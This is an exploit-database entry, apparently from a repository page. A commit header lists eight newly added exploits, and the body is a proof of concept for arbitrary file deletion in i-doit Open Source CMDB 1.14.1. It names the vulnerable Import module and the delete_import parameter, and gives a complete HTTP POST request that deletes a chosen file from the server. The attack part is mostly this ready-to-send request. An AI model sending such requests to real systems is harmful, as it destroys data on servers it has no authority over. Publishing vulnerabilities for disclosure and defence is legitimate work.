81205fc37a
8 changes to exploits/shellcodes Online Clothing Store 1.0 - Persistent Cross-Site Scripting i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion Booked Scheduler 2.7.7 - Authenticated Directory Traversal Online Clothing Store 1.0 - 'username' SQL Injection webTareas 2.0.p8 - Arbitrary File Deletion GitLab 12.9.0 - Arbitrary File Read YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection MPC Sharj 3.11.1 - Arbitrary File Download
34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
|
|
# Date: 2020-05-02
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: https://www.i-doit.org/
|
|
# Software Link: https://sourceforge.net/projects/i-doit/
|
|
# Version: v1.14.1
|
|
# Tested on: Xampp
|
|
# Credit: İsmail BOZKURT
|
|
|
|
--------------------------------------------------------------------------------------------------
|
|
|
|
Vulnerable Module ---> Import Module
|
|
Vulnerable parameter ---> delete_import
|
|
-----------
|
|
PoC
|
|
-----------
|
|
|
|
POST /idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2 HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 ******************************
|
|
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
|
Accept-Language: en-GB,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2
|
|
X-Requested-With: XMLHttpRequest
|
|
X-Prototype-Version: 1.7.3
|
|
Content-type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-i-doit-Tenant-Id: 1
|
|
Content-Length: 30
|
|
DNT: 1
|
|
Connection: close
|
|
Cookie: PHPSESSID=bf21********************************68b8
|
|
|
|
delete_import=Type the filename, you want to delete from the server here |